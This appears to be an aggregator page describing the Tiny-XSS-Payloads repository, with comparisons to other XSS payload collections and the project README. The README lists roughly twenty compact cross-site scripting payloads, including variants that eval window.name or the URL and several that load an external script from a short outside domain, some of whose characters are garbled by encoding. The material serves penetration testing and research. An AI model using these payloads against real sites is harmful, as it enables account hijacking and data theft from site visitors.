Tiny-XSS-Payloads
A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
Top Related Projects
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Awesome XSS stuff
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Quick Overview
Tiny-XSS-Payloads is a GitHub repository that provides a collection of extremely short Cross-Site Scripting (XSS) payloads. These payloads are designed to be as compact as possible while still being effective, making them useful for bypassing character limitations or evading certain security filters.
Pros
- Offers a wide variety of compact XSS payloads
- Useful for penetration testing and security research
- Regularly updated with new payloads
- Includes explanations and context for many payloads
Cons
- Can be misused for malicious purposes if not handled responsibly
- Some payloads may be outdated or ineffective against modern security measures
- Lacks comprehensive documentation on usage and implementation
- May encourage reliance on pre-made payloads rather than understanding underlying concepts
Code Examples
// Basic alert payload
<svg onload=alert(1)>
// URL-based payload
javascript:alert(1)
// HTML attribute payload
"onmouseover="alert(1)
// Script tag payload
<script>alert(1)</script>
Getting Started
To use these payloads:
- Visit the Tiny-XSS-Payloads repository
- Browse the available payloads in the README.md file
- Copy the desired payload
- Test the payload in a controlled, ethical environment
- Modify as needed for your specific use case
Remember to always use these payloads responsibly and only on systems you have permission to test.
Competitor Comparisons
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
Pros of xss-payload-list
- More comprehensive collection with a wider variety of XSS payloads
- Better organized into categories, making it easier to find specific types of payloads
- Includes additional resources and references for XSS testing
Cons of xss-payload-list
- Larger repository size, potentially overwhelming for beginners
- Less focus on minimizing payload size compared to Tiny-XSS-Payloads
- May include some outdated or less effective payloads due to its broader scope
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
xss-payload-list:
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
The Tiny-XSS-Payloads examples focus on minimal character count, while xss-payload-list provides more traditional and readable payloads. Tiny-XSS-Payloads uses shorter attribute names and omits quotes where possible, whereas xss-payload-list includes full attribute names and quotation marks for better readability and compatibility across different contexts.
Both repositories serve as valuable resources for XSS testing, with Tiny-XSS-Payloads excelling in payload minimization and xss-payload-list offering a more comprehensive collection for various scenarios.
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- Comprehensive coverage of various attack vectors beyond XSS
- Well-organized structure with separate directories for different techniques
- Regularly updated with contributions from the security community
Cons of PayloadsAllTheThings
- Larger repository size, potentially overwhelming for beginners
- Less focused on XSS-specific payloads compared to Tiny-XSS-Payloads
- May require more time to navigate and find specific XSS payloads
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
<video/poster/onerror=alert()>
PayloadsAllTheThings:
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
Both repositories provide concise XSS payloads, but Tiny-XSS-Payloads focuses on more compact and creative variations. PayloadsAllTheThings offers a broader range of payloads, including traditional and modern techniques.
While Tiny-XSS-Payloads excels in providing minimal XSS payloads, PayloadsAllTheThings offers a more extensive collection of security-related payloads and techniques. The choice between the two depends on the user's specific needs and level of expertise in web security testing.
Awesome XSS stuff
Pros of AwesomeXSS
- Comprehensive collection of XSS payloads, techniques, and resources
- Well-organized with categories for different XSS types and bypass methods
- Includes additional tools and references for XSS testing
Cons of AwesomeXSS
- May be overwhelming for beginners due to the large amount of information
- Some payloads might be outdated or less effective against modern security measures
- Lacks focus on minimizing payload size for specific scenarios
Code Comparison
Tiny-XSS-Payloads:
<svg/onload=alert()>
<img/src/onerror=alert()>
AwesomeXSS:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
Summary
Tiny-XSS-Payloads focuses on compact, efficient XSS payloads, making it ideal for scenarios with strict character limitations. It's straightforward and easy to use for quick testing.
AwesomeXSS offers a more comprehensive approach, covering various XSS techniques, bypass methods, and additional resources. It's better suited for in-depth XSS research and testing across different scenarios.
Both repositories provide valuable XSS payloads, but they cater to different needs. Tiny-XSS-Payloads is best for minimalist, space-constrained exploits, while AwesomeXSS is more suitable for extensive XSS testing and learning.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Comprehensive collection of multiple types of security-related lists, not limited to XSS payloads
- Regularly updated with contributions from the security community
- Well-organized directory structure for easy navigation
Cons of SecLists
- Large repository size may be overwhelming for specific use cases
- Requires more time to find relevant payloads due to extensive content
- May include outdated or less effective payloads alongside current ones
Code Comparison
Tiny-XSS-Payloads example:
<svg/onload=alert()>
SecLists example (from XSS-Injection/XSS-Cheat-Sheet-PortSwigger.txt):
<script>alert(document.domain)</script>
Both repositories provide XSS payloads, but Tiny-XSS-Payloads focuses on compact, efficient payloads, while SecLists offers a broader range of options.
SecLists is a more extensive resource covering various security testing aspects, whereas Tiny-XSS-Payloads specializes in concise XSS vectors. SecLists is ideal for comprehensive security assessments, while Tiny-XSS-Payloads is better suited for quick XSS testing or situations where payload size matters.
Convert 
designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Tiny-XSS-Payloads
A collection of short XSS payloads that can be used in different contexts.
The DEMO available here: https://tinyxss.terjanq.me
Current Payloads
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script -->
<script/src=//Ç.â¨></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\Ç.â¨?/>
<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//Ç.⨠/>">
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\Ç.â¨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//Ç.â¨></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because Ç.⨠checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\Ç.â¨/)>
<!-- Uses external script as import, triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because Ç.⨠checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\Ç.â¨/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because Ç.⨠checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\Ç.â¨/)>
Deprecated:
<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
Top Related Projects
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Awesome XSS stuff
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot